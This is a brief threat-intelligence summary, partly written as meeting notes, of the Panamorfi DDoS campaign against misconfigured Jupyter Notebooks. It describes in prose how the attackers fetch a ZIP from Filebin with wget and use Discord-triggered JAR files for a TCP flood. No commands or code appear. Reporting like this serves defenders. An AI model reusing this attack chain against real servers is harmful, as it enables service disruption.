August 3, 2024 at 01:06AM
Cybersecurity researchers disclosed a new DDoS attack campaign, Panamorfi, targeting misconfigured Jupyter Notebooks. The attack uses a Java-based tool, mineping, to launch a TCP flood DDoS attack on servers. Exploiting internet-exposed Jupyter Notebook instances, the attack aims to consume server resources and is attributed to the threat actor yawixooo. Previous attacks on Jupyter Notebooks have also been observed.
From the meeting notes on August 3, 2024, the discussion centered around a new distributed denial-of-service (DDoS) attack campaign known as Panamorfi. This campaign targets misconfigured Jupyter Notebooks and is conducted using a Java-based tool called mineping to launch a TCP flood DDoS attack. The attack involves exploiting internet-exposed Jupyter Notebook instances to run wget commands, fetching a ZIP archive hosted on a file-sharing site named Filebin. The ZIP file contains two Java archive (JAR) files, conn.jar and mineping.jar, with the former used to establish connections to a Discord channel and trigger the execution of the mineping.jar package. The attack aims to consume the resources of the target server by sending a large number of TCP connection requests, with the results written to the Discord channel. The campaign has been attributed to a threat actor known as yawixooo, who has a public GitHub repository containing a Minecraft server properties file. It was noted that this is not the first time internet-accessible Jupyter Notebooks have been targeted by adversaries, with previous incidents reported in October 2023.